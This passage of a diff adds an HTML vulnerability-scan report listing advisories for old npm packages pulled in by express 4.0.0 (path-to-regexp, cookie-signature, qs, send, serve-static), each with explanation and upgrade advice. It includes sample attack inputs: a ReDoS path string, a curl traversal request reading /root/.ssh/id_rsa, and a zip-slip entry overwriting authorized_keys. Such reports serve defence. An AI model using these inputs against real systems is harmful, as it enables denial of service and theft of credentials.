+    <div class="issue-summary severity--medium">
+      <div class="issue-description"><h2>Overview</h2><p>Affected versions of this package are vulnerable to Regular Expression Denial of Service (ReDoS) when including multiple regular expression parameters in a single segment, when the separator is not <code>.</code> (e.g. no <code>/:a-:b</code>). Poor performance will block the event loop and can lead to a DoS.</p><p><strong>Note:</strong></p><p>This issue is caused due to an incomplete fix for <a href="https://security.snyk.io/vuln/SNYK-JS-PATHTOREGEXP-7925106" target="_blank" rel="noopener noreferrer">CVE-2024-45296</a>.</p><h2>Workarounds</h2><p>This can be mitigated by avoiding using two parameters within a single path segment, when the separator is not <code>.</code> (e.g. no <code>/:a-:b</code>). Alternatively, the regex used for both parameters can be defined to ensure they do not overlap to allow backtracking.</p><h2>PoC</h2><pre><code>/a${&#39;-a&#39;.repeat(8_000)}/a
+</code></pre><h2>Details</h2><p>Denial of Service (DoS) describes a family of attacks, all aimed at making a system inaccessible to its original and legitimate users. There are many types of DoS attacks, ranging from trying to clog the network pipes to the system by generating a large volume of traffic from many machines (a Distributed Denial of Service - DDoS - attack) to sending crafted requests that cause a system to crash or take a disproportional amount of time to process.</p><p>The Regular expression Denial of Service (ReDoS) is a type of Denial of Service attack. Regular expressions are incredibly powerful, but they aren&#39;t very intuitive and can ultimately end up making it easy for attackers to take your site down.</p><p>Let’s take the following regular expression as an example:</p><pre><code>regex = /A(B|C+)+D/
+</code></pre><p>This regular expression accomplishes the following:</p><ul><li><code>A</code> The string must start with the letter &#39;A&#39;</li><li><code>(B|C+)+</code> The string must then follow the letter A with either the letter &#39;B&#39; or some number of occurrences of the letter &#39;C&#39; (the <code>+</code> matches one or more times). The <code>+</code> at the end of this section states that we can look for one or more matches of this section.</li><li><code>D</code> Finally, we ensure this section of the string ends with a &#39;D&#39;</li></ul><p>The expression would match inputs such as <code>ABBD</code>, <code>ABCCCCD</code>, <code>ABCBCCCD</code> and <code>ACCCCCD</code></p><p>It most cases, it doesn&#39;t take very long for a regex engine to find a match:</p><pre><code>$ time node -e &#39;/A(B|C+)+D/.test(&#34;ACCCCCCCCCCCCCCCCCCCCCCCCCCCCD&#34;)&#39;
+0.04s user 0.01s system 95% cpu 0.052 total
+
+$ time node -e &#39;/A(B|C+)+D/.test(&#34;ACCCCCCCCCCCCCCCCCCCCCCCCCCCCX&#34;)&#39;
+1.79s user 0.02s system 99% cpu 1.812 total
+</code></pre><p>The entire process of testing it against a 30 characters long string takes around ~52ms. But when given an invalid string, it takes nearly two seconds to complete the test, over ten times as long as it took to test a valid string. The dramatic difference is due to the way regular expressions get evaluated.</p><p>Most Regex engines will work very similarly (with minor differences). The engine will match the first possible way to accept the current character and proceed to the next one. If it then fails to match the next one, it will backtrack and see if there was another way to digest the previous character. If it goes too far down the rabbit hole only to find out the string doesn’t match in the end, and if many characters have multiple valid regex paths, the number of backtracking steps can become very large, resulting in what is known as _catastrophic backtracking_.</p><p>Let&#39;s look at how our expression runs into this problem, using a shorter string: &#34;ACCCX&#34;. While it seems fairly straightforward, there are still four different ways that the engine could match those three C&#39;s:</p><ol><li>CCC</li><li>CC+C</li><li>C+CC</li><li>C+C+C.</li></ol><p>The engine has to try each of those combinations to see if any of them potentially match against the expression. When you combine that with the other steps the engine must take, we can use <a href="https://regex101.com/debugger" target="_blank" rel="noopener noreferrer">RegEx 101 debugger</a> to see the engine has to take a total of 38 steps before it can determine the string doesn&#39;t match.</p><p>From there, the number of steps the engine must use to validate a string just continues to grow.</p><table><thead><tr><th>String</th><th>Number of C&#39;s</th><th>Number of steps</th></tr></thead><tbody><tr><td>ACCCX</td><td>3</td><td>38</td></tr><tr><td>ACCCCX</td><td>4</td><td>71</td></tr><tr><td>ACCCCCX</td><td>5</td><td>136</td></tr><tr><td>ACCCCCCCCCCCCCCX</td><td>14</td><td>65,553</td></tr></tbody></table><p>By the time the string includes 14 C&#39;s, the engine has to take over 65,000 steps just to see if the string is valid. These extreme situations can cause them to work very slowly (exponentially related to input size, as shown above), allowing an attacker to exploit this and can cause the service to excessively consume CPU, resulting in a Denial of Service.</p><h2>Remediation</h2><p>Upgrade <code>path-to-regexp</code> to version 0.1.12 or higher.</p><h2>References</h2><ul><li><a href="https://blakeembrey.com/posts/2024-09-web-redos" target="_blank" rel="noopener noreferrer">Blog Post</a></li><li><a href="https://github.com/pillarjs/path-to-regexp/commit/f01c26a013b1889f0c217c643964513acf17f6a4" target="_blank" rel="noopener noreferrer">GitHub Commit</a></li></ul></div>
+    </div>
+    <div class="vuln-link"><a href="https://snyk.io/vuln/SNYK-JS-PATHTOREGEXP-8482416" target="_blank" rel="noopener noreferrer">More about this vulnerability</a></div>
+  </div>
+</div>
+      <div class="issue-card severity--medium">
+  <div class="risk-score"><div class="risk-score__label">RISK SCORE</div><div class="risk-score__value">86</div></div>
+  <div class="card-header">
+    <div class="card-header-main">
+      <div class="severity-icon" style="background:#D68000">M</div>
+      <h3>Non-Constant Time String Comparison</h3>
+    </div>
+    <ul class="card-meta">
+      <li class="card-meta-item">npm:cookie-signature:20160804</li>
+      <li class="card-meta-item">CWE-208</li>
+      <li class="card-meta-item">Security</li>
+    </ul>
+  </div>
+  <div class="card-section">
+    <div class="card-detail"><span class="detail-label">Vulnerable module:</span> cookie-signature@1.0.3</div>
+    <div class="card-detail"><span class="detail-label">Introduced through:</span>
+      <div class="dep-path">tsc@1.0.0 &#x203A; express@4.0.0 &#x203A; cookie-signature@1.0.3</div>
+    </div>
+    <div class="issue-summary severity--medium">
+      <div class="issue-description"><h2>Overview</h2><p><a href="https://www.npmjs.com/package/cookie-signature" target="_blank" rel="noopener noreferrer">&#39;cookie-signature&#39;</a> is a library for signing cookies.</p><p>Versions before <code>1.0.4</code> of the library use the built-in string comparison mechanism, <code>===</code>, and not a time constant string comparison. As a result, the comparison will fail faster when the first characters in the token are incorrect.</p><p>An attacker can use this difference to perform a timing attack, essentially allowing them to guess the secret one character at a time.</p><p>You can read more about timing attacks in Node.js on the Snyk blog: https://snyk.io/blog/node-js-timing-attack-ccc-ctf/</p><h2>Remediation</h2><p>Upgrade to <code>1.0.4</code> or greater.</p><h2>References</h2><ul><li><a href="https://github.com/tj/node-cookie-signature/blob/master/History.md#104--2014-06-25" target="_blank" rel="noopener noreferrer">GitHub History</a></li><li><a href="https://github.com/tj/node-cookie-signature/commit/39791081692e9e14aa62855369e1c7f80fbfd50e" target="_blank" rel="noopener noreferrer">GitHub Commit</a></li></ul></div>
+    </div>
+    <div class="vuln-link"><a href="https://snyk.io/vuln/npm:cookie-signature:20160804" target="_blank" rel="noopener noreferrer">More about this vulnerability</a></div>
+  </div>
+</div>
+      <div class="issue-card severity--medium">
+  <div class="risk-score"><div class="risk-score__label">RISK SCORE</div><div class="risk-score__value">69</div></div>
+  <div class="card-header">
+    <div class="card-header-main">
+      <div class="severity-icon" style="background:#D68000">M</div>
+      <h3>Cross-site Scripting (XSS)</h3>
+    </div>
+    <ul class="card-meta">
+      <li class="card-meta-item">npm:express:20140912</li>
+      <li class="card-meta-item">CWE-79</li>
+      <li class="card-meta-item">Security</li>
+    </ul>
+  </div>
+  <div class="card-section">
+    <div class="card-detail"><span class="detail-label">Vulnerable module:</span> express@4.0.0</div>
+    <div class="card-detail"><span class="detail-label">Introduced through:</span>
+      <div class="dep-path">tsc@1.0.0 &#x203A; express@4.0.0</div>
+    </div>
+    <div class="issue-summary severity--medium">
+      <div class="issue-description"><h2>Overview</h2><p><a href="https://www.npmjs.com/package/express" target="_blank" rel="noopener noreferrer"><code>express</code></a> is a minimalist web framework.</p><p>Affected versions of this package do not enforce the user&#39;s browser to set a specific charset in the content-type header while displaying 400 level response messages. This could be used by remote attackers to perform a cross-site scripting attack, by using non-standard encodings like UTF-7.</p><h2>Details</h2><p>&lt;&lt;XSS&gt;&gt;</p><h2>Recommendations</h2><p>Update express to <code>3.11.0</code>, <code>4.5.0</code> or higher.</p><h2>References</h2><ul><li><a href="https://github.com/expressjs/express/releases/tag/3.11.0" target="_blank" rel="noopener noreferrer">GitHub release 3.11.0</a></li><li><a href="https://github.com/expressjs/express/releases/tag/4.5.0" target="_blank" rel="noopener noreferrer">GitHub release 4.5.0</a></li></ul></div>
+    </div>
+    <div class="vuln-link"><a href="https://snyk.io/vuln/npm:express:20140912" target="_blank" rel="noopener noreferrer">More about this vulnerability</a></div>
+  </div>
+</div>
+      <div class="issue-card severity--medium">
+  <div class="risk-score"><div class="risk-score__label">RISK SCORE</div><div class="risk-score__value">74</div></div>
+  <div class="card-header">
+    <div class="card-header-main">
+      <div class="severity-icon" style="background:#D68000">M</div>
+      <h3>Denial of Service (DoS)</h3>
+    </div>
+    <ul class="card-meta">
+      <li class="card-meta-item">npm:qs:20140806-1</li>
+      <li class="card-meta-item">CWE-400</li>
+      <li class="card-meta-item">Security</li>
+    </ul>
+  </div>
+  <div class="card-section">
+    <div class="card-detail"><span class="detail-label">Vulnerable module:</span> qs@0.6.6</div>
+    <div class="card-detail"><span class="detail-label">Introduced through:</span>
+      <div class="dep-path">tsc@1.0.0 &#x203A; express@4.0.0 &#x203A; qs@0.6.6</div>
+    </div>
+    <div class="issue-summary severity--medium">
+      <div class="issue-description"><h2>Overview</h2><p><a href="https://www.npmjs.com/package/qs" target="_blank" rel="noopener noreferrer">qs</a> is a querystring parser that supports nesting and arrays, with a depth limit.</p><p>Affected versions of this package are vulnerable to Denial of Service (DoS). When parsing a string representing a deeply nested object, qs will block the event loop for long periods of time. Such a delay may hold up the server&#39;s resources, keeping it from processing other requests in the meantime, thus enabling a Denial-of-Service attack.</p><h2>Details</h2><p>Denial of Service (DoS) describes a family of attacks, all aimed at making a system inaccessible to its original and legitimate users. There are many types of DoS attacks, ranging from trying to clog the network pipes to the system by generating a large volume of traffic from many machines (a Distributed Denial of Service - DDoS - attack) to sending crafted requests that cause a system to crash or take a disproportional amount of time to process.</p><p>The Regular expression Denial of Service (ReDoS) is a type of Denial of Service attack. Regular expressions are incredibly powerful, but they aren&#39;t very intuitive and can ultimately end up making it easy for attackers to take your site down.</p><p>Let’s take the following regular expression as an example:</p><pre><code>regex = /A(B|C+)+D/
+</code></pre><p>This regular expression accomplishes the following:</p><ul><li><code>A</code> The string must start with the letter &#39;A&#39;</li><li><code>(B|C+)+</code> The string must then follow the letter A with either the letter &#39;B&#39; or some number of occurrences of the letter &#39;C&#39; (the <code>+</code> matches one or more times). The <code>+</code> at the end of this section states that we can look for one or more matches of this section.</li><li><code>D</code> Finally, we ensure this section of the string ends with a &#39;D&#39;</li></ul><p>The expression would match inputs such as <code>ABBD</code>, <code>ABCCCCD</code>, <code>ABCBCCCD</code> and <code>ACCCCCD</code></p><p>It most cases, it doesn&#39;t take very long for a regex engine to find a match:</p><pre><code>$ time node -e &#39;/A(B|C+)+D/.test(&#34;ACCCCCCCCCCCCCCCCCCCCCCCCCCCCD&#34;)&#39;
+0.04s user 0.01s system 95% cpu 0.052 total
+
+$ time node -e &#39;/A(B|C+)+D/.test(&#34;ACCCCCCCCCCCCCCCCCCCCCCCCCCCCX&#34;)&#39;
+1.79s user 0.02s system 99% cpu 1.812 total
+</code></pre><p>The entire process of testing it against a 30 characters long string takes around ~52ms. But when given an invalid string, it takes nearly two seconds to complete the test, over ten times as long as it took to test a valid string. The dramatic difference is due to the way regular expressions get evaluated.</p><p>Most Regex engines will work very similarly (with minor differences). The engine will match the first possible way to accept the current character and proceed to the next one. If it then fails to match the next one, it will backtrack and see if there was another way to digest the previous character. If it goes too far down the rabbit hole only to find out the string doesn’t match in the end, and if many characters have multiple valid regex paths, the number of backtracking steps can become very large, resulting in what is known as _catastrophic backtracking_.</p><p>Let&#39;s look at how our expression runs into this problem, using a shorter string: &#34;ACCCX&#34;. While it seems fairly straightforward, there are still four different ways that the engine could match those three C&#39;s:</p><ol><li>CCC</li><li>CC+C</li><li>C+CC</li><li>C+C+C.</li></ol><p>The engine has to try each of those combinations to see if any of them potentially match against the expression. When you combine that with the other steps the engine must take, we can use <a href="https://regex101.com/debugger" target="_blank" rel="noopener noreferrer">RegEx 101 debugger</a> to see the engine has to take a total of 38 steps before it can determine the string doesn&#39;t match.</p><p>From there, the number of steps the engine must use to validate a string just continues to grow.</p><table><thead><tr><th>String</th><th>Number of C&#39;s</th><th>Number of steps</th></tr></thead><tbody><tr><td>ACCCX</td><td>3</td><td>38</td></tr><tr><td>ACCCCX</td><td>4</td><td>71</td></tr><tr><td>ACCCCCX</td><td>5</td><td>136</td></tr><tr><td>ACCCCCCCCCCCCCCX</td><td>14</td><td>65,553</td></tr></tbody></table><p>By the time the string includes 14 C&#39;s, the engine has to take over 65,000 steps just to see if the string is valid. These extreme situations can cause them to work very slowly (exponentially related to input size, as shown above), allowing an attacker to exploit this and can cause the service to excessively consume CPU, resulting in a Denial of Service.</p><h2>Remediation</h2><p>Upgrade <code>qs</code> to version 1.0.0 or higher.</p><h2>References</h2><ul><li><a href="https://nodesecurity.io/advisories/28" target="_blank" rel="noopener noreferrer">Node Security Advisory</a></li></ul></div>
+    </div>
+    <div class="vuln-link"><a href="https://snyk.io/vuln/npm:qs:20140806-1" target="_blank" rel="noopener noreferrer">More about this vulnerability</a></div>
+  </div>
+</div>
+      <div class="issue-card severity--medium">
+  <div class="risk-score"><div class="risk-score__label">RISK SCORE</div><div class="risk-score__value">39</div></div>
+  <div class="card-header">
+    <div class="card-header-main">
+      <div class="severity-icon" style="background:#D68000">M</div>
+      <h3>Directory Traversal</h3>
+    </div>
+    <ul class="card-meta">
+      <li class="card-meta-item">npm:send:20140912</li>
+      <li class="card-meta-item">CWE-23</li>
+      <li class="card-meta-item">Security</li>
+    </ul>
+  </div>
+  <div class="card-section">
+    <div class="card-detail"><span class="detail-label">Vulnerable module:</span> send@0.2.0</div>
+    <div class="card-detail"><span class="detail-label">Introduced through:</span>
+      <div class="dep-path">tsc@1.0.0 &#x203A; express@4.0.0 &#x203A; send@0.2.0</div>
+      <details class="dep-paths-toggle">
+        <summary><span class="toggle-more">Show 1 more path</span><span class="toggle-less">Show less</span></summary>
+        <div class="dep-path">tsc@1.0.0 &#x203A; express@4.0.0 &#x203A; serve-static@1.0.1 &#x203A; send@0.1.4</div>
+      </details>
+    </div>
+    <div class="issue-summary severity--medium">
+      <div class="issue-description"><h2>Overview</h2><p><a href="https://www.npmjs.com/package/send" target="_blank" rel="noopener noreferrer">send</a> is a library for streaming files from the file system.</p><p>Affected versions of this package are vulnerable to Directory-Traversal attacks due to insecure comparison.</p><p>When relying on the root option to restrict file access a malicious user may escape out of the restricted directory and access files in a similarly named directory. For example, a path like <code>/my-secret</code> is consedered fine for the root <code>/my</code>.</p><h2>Details</h2><p>A Directory Traversal attack (also known as path traversal) aims to access files and directories that are stored outside the intended folder. By manipulating files with &#34;dot-dot-slash (../)&#34; sequences and its variations, or by using absolute file paths, it may be possible to access arbitrary files and directories stored on file system, including application source code, configuration, and other critical system files.</p><p>Directory Traversal vulnerabilities can be generally divided into two types:</p><ul><li><strong>Information Disclosure</strong>: Allows the attacker to gain information about the folder structure or read the contents of sensitive files on the system.</li></ul><p><code>st</code> is a module for serving static files on web pages, and contains a <a href="https://snyk.io/vuln/npm:st:20140206" target="_blank" rel="noopener noreferrer">vulnerability of this type</a>. In our example, we will serve files from the <code>public</code> route.</p><p>If an attacker requests the following URL from our server, it will in turn leak the sensitive private key of the root user.</p><pre><code>curl http://localhost:8080/public/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/root/.ssh/id_rsa
+</code></pre><p><strong>Note</strong> <code>%2e</code> is the URL encoded version of <code>.</code> (dot).</p><ul><li><strong>Writing arbitrary files</strong>: Allows the attacker to create or replace existing files. This type of vulnerability is also known as <code>Zip-Slip</code>.</li></ul><p>One way to achieve this is by using a malicious <code>zip</code> archive that holds path traversal filenames. When each filename in the zip archive gets concatenated to the target extraction folder, without validation, the final path ends up outside of the target folder. If an executable or a configuration file is overwritten with a file containing malicious code, the problem can turn into an arbitrary code execution issue quite easily.</p><p>The following is an example of a <code>zip</code> archive with one benign file and one malicious file. Extracting the malicious file will result in traversing out of the target folder, ending up in <code>/root/.ssh/</code> overwriting the <code>authorized_keys</code> file:</p><pre><code>2018-04-15 22:04:29 .....           19           19  good.txt
+2018-04-15 22:04:42 .....           20           20  ../../../../../../root/.ssh/authorized_keys
+</code></pre><h2>Remediation</h2><p>Upgrade to a version greater than or equal to 0.8.4.</p><h2>References</h2><ul><li><a href="https://github.com/visionmedia/send/pull/59" target="_blank" rel="noopener noreferrer">GitHub PR</a></li><li><a href="https://github.com/visionmedia/send/commit/9c6ca9b2c0b880afd3ff91ce0d211213c5fa5f9a" target="_blank" rel="noopener noreferrer">GitHub Commit</a></li></ul></div>
+    </div>
+    <div class="vuln-link"><a href="https://snyk.io/vuln/npm:send:20140912" target="_blank" rel="noopener noreferrer">More about this vulnerability</a></div>
+  </div>
+</div>
+      <div class="issue-card severity--medium">
+  <div class="risk-score"><div class="risk-score__label">RISK SCORE</div><div class="risk-score__value">40</div></div>
+  <div class="card-header">
+    <div class="card-header-main">
+      <div class="severity-icon" style="background:#D68000">M</div>
+      <h3>Root Path Disclosure</h3>
+    </div>
+    <ul class="card-meta">
+      <li class="card-meta-item">npm:send:20151103</li>
+      <li class="card-meta-item">CWE-200</li>
+      <li class="card-meta-item">Security</li>
+    </ul>
+  </div>
+  <div class="card-section">
+    <div class="card-detail"><span class="detail-label">Vulnerable module:</span> send@0.2.0</div>
+    <div class="card-detail"><span class="detail-label">Introduced through:</span>
+      <div class="dep-path">tsc@1.0.0 &#x203A; express@4.0.0 &#x203A; send@0.2.0</div>
+      <details class="dep-paths-toggle">
+        <summary><span class="toggle-more">Show 1 more path</span><span class="toggle-less">Show less</span></summary>
+        <div class="dep-path">tsc@1.0.0 &#x203A; express@4.0.0 &#x203A; serve-static@1.0.1 &#x203A; send@0.1.4</div>
+      </details>
+    </div>
+    <div class="issue-summary severity--medium">
+      <div class="issue-description"><h2>Overview</h2><p><a href="https://www.npmjs.com/package/send" target="_blank" rel="noopener noreferrer">Send</a> is a library for streaming files from the file system as an http response. It supports partial responses (Ranges), conditional-GET negotiation, high test coverage, and granular events which may be leveraged to take appropriate actions in your application or framework.</p><p>Affected versions of this package are vulnerable to a Root Path Disclosure.</p><h2>Remediation</h2><p>Upgrade <code>send</code> to version 0.11.1 or higher.</p><p>If a direct dependency update is not possible, use <a href="https://snyk.io/docs/using-snyk#wizard" target="_blank" rel="noopener noreferrer">snyk wizard</a> to patch this vulnerability.</p><h2>References</h2><ul><li><a href="https://github.com/pillarjs/send/pull/70" target="_blank" rel="noopener noreferrer">GitHub PR</a></li><li><a href="https://github.com/pillarjs/send/commit/98a5b89982b38e79db684177cf94730ce7fc7aed" target="_blank" rel="noopener noreferrer">GitHub Commit</a></li><li><a href="https://github.com/expressjs/serve-static/blob/master/HISTORY.md#181--2015-01-20" target="_blank" rel="noopener noreferrer">GitHub History</a></li><li><a href="http://expressjs.com/advanced/security-updates.html" target="_blank" rel="noopener noreferrer">Expressjs Security Update</a></li></ul></div>
+    </div>
+    <div class="vuln-link"><a href="https://snyk.io/vuln/npm:send:20151103" target="_blank" rel="noopener noreferrer">More about this vulnerability</a></div>
+  </div>
+</div>
+      <div class="issue-card severity--low">
+  <div class="risk-score"><div class="risk-score__label">RISK SCORE</div><div class="risk-score__value">57</div></div>
+  <div class="card-header">
+    <div class="card-header-main">
+      <div class="severity-icon" style="background:#88879E">L</div>
+      <h3>Cross-site Scripting</h3>
+    </div>
+    <ul class="card-meta">
+      <li class="card-meta-item">SNYK-JS-SEND-7926862</li>
+      <li class="card-meta-item">CWE-79</li>
+      <li class="card-meta-item">Security</li>
+    </ul>
+  </div>
+  <div class="card-section">
+    <div class="card-detail"><span class="detail-label">Vulnerable module:</span> send@0.2.0</div>
+    <div class="card-detail"><span class="detail-label">Introduced through:</span>
+      <div class="dep-path">tsc@1.0.0 &#x203A; express@4.0.0 &#x203A; send@0.2.0</div>
+      <details class="dep-paths-toggle">
+        <summary><span class="toggle-more">Show 1 more path</span><span class="toggle-less">Show less</span></summary>
+        <div class="dep-path">tsc@1.0.0 &#x203A; express@4.0.0 &#x203A; serve-static@1.0.1 &#x203A; send@0.1.4</div>
+      </details>
+    </div>
+    <div class="issue-summary severity--low">
+      <div class="issue-description"><h2>Overview</h2><p><a href="https://github.com/pillarjs/send" target="_blank" rel="noopener noreferrer">send</a> is a Better streaming static file server with Range and conditional-GET support</p><p>Affected versions of this package are vulnerable to Cross-site Scripting due to improper user input sanitization passed to the <code>SendStream.redirect()</code> function, which executes untrusted code. An attacker can execute arbitrary code by manipulating the input parameters to this method.</p><p><strong>Note:</strong></p><p>Exploiting this vulnerability requires the following:</p><p>1) The attacker needs to control the input to <code>response.redirect()</code></p><p>2) Express MUST NOT redirect before the template appears</p><p>3) The browser MUST NOT complete redirection before</p><p>4) The user MUST click on the link in the template</p><h2>Details</h2><p>Cross-site scripting (or XSS) is a code vulnerability that occurs when an attacker “injects” a malicious script into an otherwise trusted website. The injected script gets downloaded and executed by the end user’s browser when the user interacts with the compromised website.</p><p>This is done by escaping the context of the web application; the web application then delivers that data to its users along with other trusted dynamic content, without validating it. The browser unknowingly executes malicious script on the client side (through client-side languages; usually JavaScript or HTML)  in order to perform actions that are otherwise typically blocked by the browser’s Same Origin Policy.</p><p>Injecting malicious code is the most prevalent manner by which XSS is exploited; for this reason, escaping characters in order to prevent this manipulation is the top method for securing code against this vulnerability.</p><p>Escaping means that the application is coded to mark key characters, and particularly key characters included in user input, to prevent those characters from being interpreted in a dangerous context. For example, in HTML, <code>&lt;</code> can be coded as  <code>&amp;lt</code>; and <code>&gt;</code> can be coded as <code>&amp;gt</code>; in order to be interpreted and displayed as themselves in text, while within the code itself, they are used for HTML tags. If malicious content is injected into an application that escapes special characters and that malicious content uses <code>&lt;</code> and <code>&gt;</code> as HTML tags, those characters are nonetheless not interpreted as HTML tags by the browser if they’ve been correctly escaped in the application code and in this way the attempted attack is diverted.</p><p>The most prominent use of XSS is to steal cookies (source: OWASP HttpOnly) and hijack user sessions, but XSS exploits have been used to expose sensitive information, enable access to privileged services and functionality and deliver malware.</p><h3>Types of attacks</h3><p>There are a few methods by which XSS can be manipulated:</p><table><thead><tr><th>Type</th><th>Origin</th><th>Description</th></tr></thead><tbody><tr><td><strong>Stored</strong></td><td>Server</td><td>The malicious code is inserted in the application (usually as a link) by the attacker. The code is activated every time a user clicks the link.</td></tr><tr><td><strong>Reflected</strong></td><td>Server</td><td>The attacker delivers a malicious link externally from the vulnerable web site application to a user. When clicked, malicious code is sent to the vulnerable web site, which reflects the attack back to the user’s browser.</td></tr><tr><td><strong>DOM-based</strong></td><td>Client</td><td>The attacker forces the user’s browser to render a malicious page. The data in the page itself delivers the cross-site scripting data.</td></tr><tr><td><strong>Mutated</strong></td><td></td><td>The attacker injects code that appears safe, but is then rewritten and modified by the browser, while parsing the markup. An example is rebalancing unclosed quotation marks or even adding quotation marks to unquoted parameters.</td></tr></tbody></table><h3>Affected environments</h3><p>The following environments are susceptible to an XSS attack:</p><ul><li>Web servers</li><li>Application servers</li><li>Web application environments</li></ul><h3>How to prevent</h3><p>This section describes the top best practices designed to specifically protect your code:</p><ul><li>Sanitize data input in an HTTP request before reflecting it back, ensuring all data is validated, filtered or escaped before echoing anything back to the user, such as the values of query parameters during searches.</li><li>Convert special characters such as <code>?</code>, <code>&amp;</code>, <code>/</code>, <code>&lt;</code>, <code>&gt;</code> and spaces to their respective HTML or URL encoded equivalents.</li><li>Give users the option to disable client-side scripts.</li><li>Redirect invalid requests.</li><li>Detect simultaneous logins, including those from two separate IP addresses, and invalidate those sessions.</li><li>Use and enforce a Content Security Policy (source: Wikipedia) to disable any features that might be manipulated for an XSS attack.</li><li>Read the documentation for any of the libraries referenced in your code to understand which elements allow for embedded HTML.</li></ul><h2>Remediation</h2><p>Upgrade <code>send</code> to version 0.19.0, 1.1.0 or higher.</p><h2>References</h2><ul><li><a href="https://github.com/pillarjs/send/commit/ae4f2989491b392ae2ef3b0015a019770ae65d35" target="_blank" rel="noopener noreferrer">GitHub Commit</a></li></ul></div>
+    </div>
+    <div class="vuln-link"><a href="https://snyk.io/vuln/SNYK-JS-SEND-7926862" target="_blank" rel="noopener noreferrer">More about this vulnerability</a></div>
+  </div>
+</div>
+      <div class="issue-card severity--low">
+  <div class="risk-score"><div class="risk-score__label">RISK SCORE</div><div class="risk-score__value">57</div></div>
+  <div class="card-header">
+    <div class="card-header-main">
+      <div class="severity-icon" style="background:#88879E">L</div>
+      <h3>Cross-site Scripting</h3>
+    </div>
+    <ul class="card-meta">
+      <li class="card-meta-item">SNYK-JS-SERVESTATIC-7926865</li>
+      <li class="card-meta-item">CWE-79</li>
+      <li class="card-meta-item">Security</li>
+    </ul>
+  </div>
+  <div class="card-section">
+    <div class="card-detail"><span class="detail-label">Vulnerable module:</span> serve-static@1.0.1</div>
+    <div class="card-detail"><span class="detail-label">Introduced through:</span>
+      <div class="dep-path">tsc@1.0.0 &#x203A; express@4.0.0 &#x203A; serve-static@1.0.1</div>
+    </div>
+    <div class="issue-summary severity--low">
+      <div class="issue-description"><h2>Overview</h2><p><a href="https://github.com/expressjs/serve-static" target="_blank" rel="noopener noreferrer">serve-static</a> is a server.</p><p>Affected versions of this package are vulnerable to Cross-site Scripting due to improper sanitization of user input in the <code>redirect</code> function. An attacker can manipulate the redirection process by injecting malicious code into the input.</p><p><strong>Note</strong></p><p>To exploit this vulnerability, the following conditions are required:</p><p>1) The attacker should be able to control the input to <code>response.redirect()</code></p><p>2) express must not redirect before the template appears</p><p>3) the browser must not complete redirection before:</p><p>4) the user must click on the link in the template</p><h2>Details</h2><p>Cross-site scripting (or XSS) is a code vulnerability that occurs when an attacker “injects” a malicious script into an otherwise trusted website. The injected script gets downloaded and executed by the end user’s browser when the user interacts with the compromised website.</p><p>This is done by escaping the context of the web application; the web application then delivers that data to its users along with other trusted dynamic content, without validating it. The browser unknowingly executes malicious script on the client side (through client-side languages; usually JavaScript or HTML)  in order to perform actions that are otherwise typically blocked by the browser’s Same Origin Policy.</p><p>Injecting malicious code is the most prevalent manner by which XSS is exploited; for this reason, escaping characters in order to prevent this manipulation is the top method for securing code against this vulnerability.</p><p>Escaping means that the application is coded to mark key characters, and particularly key characters included in user input, to prevent those characters from being interpreted in a dangerous context. For example, in HTML, <code>&lt;</code> can be coded as  <code>&amp;lt</code>; and <code>&gt;</code> can be coded as <code>&amp;gt</code>; in order to be interpreted and displayed as themselves in text, while within the code itself, they are used for HTML tags. If malicious content is injected into an application that escapes special characters and that malicious content uses <code>&lt;</code> and <code>&gt;</code> as HTML tags, those characters are nonetheless not interpreted as HTML tags by the browser if they’ve been correctly escaped in the application code and in this way the attempted attack is diverted.</p><p>The most prominent use of XSS is to steal cookies (source: OWASP HttpOnly) and hijack user sessions, but XSS exploits have been used to expose sensitive information, enable access to privileged services and functionality and deliver malware.</p><h3>Types of attacks</h3><p>There are a few methods by which XSS can be manipulated:</p><table><thead><tr><th>Type</th><th>Origin</th><th>Description</th></tr></thead><tbody><tr><td><strong>Stored</strong></td><td>Server</td><td>The malicious code is inserted in the application (usually as a link) by the attacker. The code is activated every time a user clicks the link.</td></tr><tr><td><strong>Reflected</strong></td><td>Server</td><td>The attacker delivers a malicious link externally from the vulnerable web site application to a user. When clicked, malicious code is sent to the vulnerable web site, which reflects the attack back to the user’s browser.</td></tr><tr><td><strong>DOM-based</strong></td><td>Client</td><td>The attacker forces the user’s browser to render a malicious page. The data in the page itself delivers the cross-site scripting data.</td></tr><tr><td><strong>Mutated</strong></td><td></td><td>The attacker injects code that appears safe, but is then rewritten and modified by the browser, while parsing the markup. An example is rebalancing unclosed quotation marks or even adding quotation marks to unquoted parameters.</td></tr></tbody></table><h3>Affected environments</h3><p>The following environments are susceptible to an XSS attack:</p><ul><li>Web servers</li><li>Application servers</li><li>Web application environments</li></ul><h3>How to prevent</h3><p>This section describes the top best practices designed to specifically protect your code:</p><ul><li>Sanitize data input in an HTTP request before reflecting it back, ensuring all data is validated, filtered or escaped before echoing anything back to the user, such as the values of query parameters during searches.</li><li>Convert special characters such as <code>?</code>, <code>&amp;</code>, <code>/</code>, <code>&lt;</code>, <code>&gt;</code> and spaces to their respective HTML or URL encoded equivalents.</li><li>Give users the option to disable client-side scripts.</li><li>Redirect invalid requests.</li><li>Detect simultaneous logins, including those from two separate IP addresses, and invalidate those sessions.</li><li>Use and enforce a Content Security Policy (source: Wikipedia) to disable any features that might be manipulated for an XSS attack.</li><li>Read the documentation for any of the libraries referenced in your code to understand which elements allow for embedded HTML.</li></ul><h2>Remediation</h2><p>Upgrade <code>serve-static</code> to version 1.16.0, 2.1.0 or higher.</p><h2>References</h2><ul><li><a href="https://github.com/expressjs/serve-static/commit/0c11fad159898cdc69fd9ab63269b72468ecaf6b" target="_blank" rel="noopener noreferrer">GitHub Commit</a></li><li><a href="https://github.com/expressjs/serve-static/commit/ce730896fddce1588111d9ef6fdf20896de5c6fa" target="_blank" rel="noopener noreferrer">GitHub Commit</a></li></ul></div>
+    </div>
+    <div class="vuln-link"><a href="https://snyk.io/vuln/SNYK-JS-SERVESTATIC-7926865" target="_blank" rel="noopener noreferrer">More about this vulnerability</a></div>
+  </div>
+</div>
+      <div class="issue-card severity--low">
+  <div class="risk-score"><div class="risk-score__label">RISK SCORE</div><div class="risk-score__value">35</div></div>
+  <div class="card-header">
+    <div class="card-header-main">
+      <div class="severity-icon" style="background:#88879E">L</div>
+      <h3>Regular Expression Denial of Service (ReDoS)</h3>
+    </div>
+    <ul class="card-meta">
+      <li class="card-meta-item">npm:mime:20170907</li>
+      <li class="card-meta-item">CWE-400</li>
+      <li class="card-meta-item">Security</li>
+    </ul>
+  </div>
